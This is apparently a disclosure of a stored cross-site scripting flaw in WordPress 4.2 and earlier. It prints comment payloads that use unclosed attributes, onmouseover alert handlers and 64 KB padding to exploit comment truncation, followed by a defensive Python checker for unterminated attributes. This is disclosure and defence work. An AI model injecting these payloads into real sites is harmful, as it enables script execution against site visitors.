WordPress Stored XSS Vulnerability Disclosed, Affecting Version 4.2 and Below
<abbr title='We
This breaks the layout of the WordPress page. If another comment like the following is then inserted:
cedric' onmouseover='alert(1)'
style='position:fixed;top:0;left:0;width:100%;height:100%'
the page will be displayed like this:
sometext
<blockquote cite='x onmouseover=alert(1)
<a title='x onmouseover=alert(unescape(/hello%20world/.source))
style=position:absolute;left:0;top:0;width:5000px;height:5000px
AAAAAAAAAAAA [64 kb] ...'></a>
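The samples above share one trait: a quoted attribute value that is still open when the stored comment ends. The Python check below is an added example, not code from the original article or from WordPress; it flags that condition on the form a comment would take after storage. The function names, the 65,535-byte limit and the silent-truncation behaviour are assumptions.

```python
import re
# Assumption: the comment column keeps at most 65,535 bytes and truncates
# silently (matching the "[64 kb]" padding in the sample); adjust per schema.
MAX_COMMENT_BYTES = 65535
TAG_START = re.compile(r"<[A-Za-z][A-Za-z0-9]*")

def unterminated_attribute(html):
    """Name of the first tag left inside an open quoted attribute, else None."""
    pos = 0
    while True:
        m = TAG_START.search(html, pos)
        if m is None:
            return None
        i, quote = m.end(), None
        while i < len(html):
            ch = html[i]
            if quote:
                if ch == quote:
                    quote = None          # closing quote of the value
            elif ch in "'\"":
                quote = ch                # opening quote of a value
            elif ch == ">":
                break                     # tag closed outside any quote
            i += 1
        if quote:
            return m.group(0)[1:]
        pos = i + 1

def stored_form(body, limit=MAX_COMMENT_BYTES):
    """What a byte-capped column keeps when it truncates without an error."""
    return body.encode("utf-8")[:limit].decode("utf-8", errors="ignore")

def audit_comment(body, limit=MAX_COMMENT_BYTES):
    """Findings for one comment body, checked in the form it would be stored."""
    findings = []
    if len(body.encode("utf-8")) > limit:
        findings.append("oversize")
    tag = unterminated_attribute(stored_form(body, limit))
    if tag:
        findings.append("open-quote:" + tag)
    return findings

# Constructed samples: two page fragments, a benign comment, a padded one.
SAMPLES = {
    "abbr": "<abbr title='We",
    "blockquote": "sometext\n<blockquote cite='x onmouseover=alert(1)",
    "benign": "<a href=\"https://example.com\" title='ok'>link</a>",
    "padded": "<a title='note " + "A" * 70000 + "'></a>",
}
```

The padded sample is well formed as submitted and only becomes an open-quote finding once it is cut to the storage limit, so the check has to run on the truncated form, or oversize comments have to be rejected before they are stored.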
Affected versions
WordPress 4.2 and all earlier versions are affected.